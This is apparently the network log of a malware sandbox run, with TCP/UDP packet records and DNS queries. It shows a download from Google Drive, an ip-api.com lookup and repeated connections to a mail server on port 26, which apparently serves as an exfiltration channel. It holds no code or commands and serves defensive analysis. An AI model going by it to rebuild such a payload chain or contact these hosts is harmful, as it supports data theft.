                                                                          Apr 24, 2024 06:46:59.987576962 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:59.987588882 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:59.987632036 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:59.995151043 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:59.995238066 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:46:59.995250940 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:46:59.995297909 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.003184080 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.003253937 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.003271103 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.003312111 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.010267019 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.010375023 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.010808945 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.010864973 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.018599033 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.018758059 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.018779039 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.018824100 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.024741888 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.024848938 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.028388977 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.028476954 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.028502941 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.028574944 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.035640955 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.035756111 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.035773039 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.035840034 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.042805910 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.042936087 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.042953968 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.043035030 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.047696114 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.047770977 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.047791958 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.047832012 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.052334070 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.052407980 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.052423954 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.052462101 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.056665897 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.056739092 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.056755066 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.056797028 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.061305046 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.061372042 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.061388016 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.061430931 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.065969944 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.066068888 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.066086054 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.066205025 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070149899 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070213079 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070229053 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070267916 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.070276022 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.070307970 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.074423075 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.074486971 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.074660063 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.074702024 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.078659058 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.078742981 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.078758001 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.078857899 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.083064079 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.083161116 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.083178043 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.083235025 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.087116957 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.087210894 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.089226961 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.089286089 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.089301109 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.089340925 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.093591928 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.093687057 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.093700886 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.093780041 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.097498894 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.098520994 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.098531961 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.098596096 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.101515055 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.101567984 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.101578951 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.101624012 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.105556965 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.105607033 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.105616093 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.105654955 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.109404087 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.109478951 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.109488964 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.109577894 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.113642931 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.113701105 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.113713026 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.113770008 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.117309093 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.117405891 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.117417097 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.117511988 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.120932102 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.121001959 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.121011972 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.121051073 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.125066996 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.125149965 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.125159979 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.125246048 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.128321886 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.128408909 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.128417969 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.128487110 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.131937027 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.132019997 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.132030964 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.132116079 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.135632992 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.135720015 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.137403011 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.137459040 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.137480021 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.137518883 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.140897989 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.140954971 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.140965939 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.141002893 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.144682884 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.144741058 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.144757032 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.144800901 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.147917986 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.148009062 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.148021936 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.148125887 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.151405096 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.151462078 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.151475906 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.151515007 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.154957056 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.155035973 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.155076981 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.155134916 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.158423901 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.158477068 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.158488035 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.158528090 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.161767960 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.161849976 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.161859989 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.161906958 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.165146112 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.165282011 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.165294886 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.165379047 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.168592930 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.168685913 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.168694973 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.168768883 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.172003984 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.172085047 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.172094107 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.172168016 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.175389051 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.175498962 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.175509930 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.175574064 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.179275990 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.179377079 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.180545092 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.180630922 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.180645943 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.180712938 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.183957100 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.184016943 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.184027910 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.184068918 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.187041044 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.187105894 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.187133074 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.187175989 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.190741062 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.190802097 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.190814018 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.190851927 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.194031000 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.194097996 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.194108009 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.194144011 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.196394920 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.196460962 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.196470022 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.196508884 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.199299097 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.199367046 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.199404955 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.199445009 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.203033924 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.203093052 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.203100920 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.203139067 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.205405951 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.205460072 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.205475092 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.205516100 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.208539009 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.208590031 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.208600044 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.208636045 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.211812019 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.211858988 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.211868048 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.211909056 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.211915016 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.211955070 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.214659929 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.214711905 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.214720964 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.214761972 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.217730045 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.217783928 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.219345093 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.219398022 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.219419003 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.219455957 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.222395897 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.222448111 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.222457886 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.222496986 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.225558996 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.225603104 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.225620985 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.225653887 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.228173018 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.228233099 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.228240967 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.228276968 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.230792046 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.230856895 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.230865955 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.230901957 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.233577013 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.233624935 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.233633995 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.233669996 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.236258984 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.236314058 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.236352921 CEST44349712142.251.2.132192.168.2.9
                                                                          Apr 24, 2024 06:47:00.236366987 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.236398935 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.236427069 CEST49712443192.168.2.9142.251.2.132
                                                                          Apr 24, 2024 06:47:00.733684063 CEST4971480192.168.2.9208.95.112.1
                                                                          Apr 24, 2024 06:47:00.893285990 CEST8049714208.95.112.1192.168.2.9
                                                                          Apr 24, 2024 06:47:00.893529892 CEST4971480192.168.2.9208.95.112.1
                                                                          Apr 24, 2024 06:47:00.893723965 CEST4971480192.168.2.9208.95.112.1
                                                                          Apr 24, 2024 06:47:01.053816080 CEST8049714208.95.112.1192.168.2.9
                                                                          Apr 24, 2024 06:47:01.098273039 CEST4971480192.168.2.9208.95.112.1
                                                                          Apr 24, 2024 06:47:03.454669952 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:03.775980949 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:03.776858091 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:09.306396961 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:09.306626081 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:09.627837896 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:09.628130913 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:09.951370001 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:09.953587055 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:10.287724018 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:10.287919998 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:10.287938118 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:10.287976027 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:10.318593979 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:10.640249968 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:10.647492886 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:10.968452930 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:10.968943119 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:11.291812897 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:11.292148113 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:11.624841928 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:11.625283003 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:11.946372986 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:11.953622103 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.275340080 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:12.275629997 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.660677910 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.853863001 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:12.853948116 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.981739998 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:12.985340118 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.985389948 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.985419035 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:12.985435009 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:13.306242943 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:13.306360960 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:13.306396008 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:13.306428909 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:13.317148924 CEST2649715114.142.162.17192.168.2.9
                                                                          Apr 24, 2024 06:47:13.363776922 CEST4971526192.168.2.9114.142.162.17
                                                                          Apr 24, 2024 06:47:50.910259962 CEST8049714208.95.112.1192.168.2.9

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Apr 24, 2024 06:46:07.642513990 CEST5386453192.168.2.91.1.1.1
                                                                          Apr 24, 2024 06:46:07.796128035 CEST53538641.1.1.1192.168.2.9
                                                                          Apr 24, 2024 06:46:08.604441881 CEST6312653192.168.2.91.1.1.1
                                                                          Apr 24, 2024 06:46:08.757863045 CEST53631261.1.1.1192.168.2.9
                                                                          Apr 24, 2024 06:46:57.132405043 CEST5929053192.168.2.91.1.1.1
                                                                          Apr 24, 2024 06:46:57.285806894 CEST53592901.1.1.1192.168.2.9
                                                                          Apr 24, 2024 06:47:00.574791908 CEST6048753192.168.2.91.1.1.1
                                                                          Apr 24, 2024 06:47:00.728956938 CEST53604871.1.1.1192.168.2.9
                                                                          Apr 24, 2024 06:47:02.641860962 CEST5264453192.168.2.91.1.1.1
                                                                          Apr 24, 2024 06:47:03.453811884 CEST53526441.1.1.1192.168.2.9

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Apr 24, 2024 06:46:07.642513990 CEST192.168.2.91.1.1.10x574eStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:08.604441881 CEST192.168.2.91.1.1.10xeb41Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.132405043 CEST192.168.2.91.1.1.10x9106Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:47:00.574791908 CEST192.168.2.91.1.1.10x703cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:47:02.641860962 CEST192.168.2.91.1.1.10x46a4Standard query (0)mail.cash4cars.nzA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Apr 24, 2024 06:46:01.930002928 CEST1.1.1.1192.168.2.90x1cf2No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
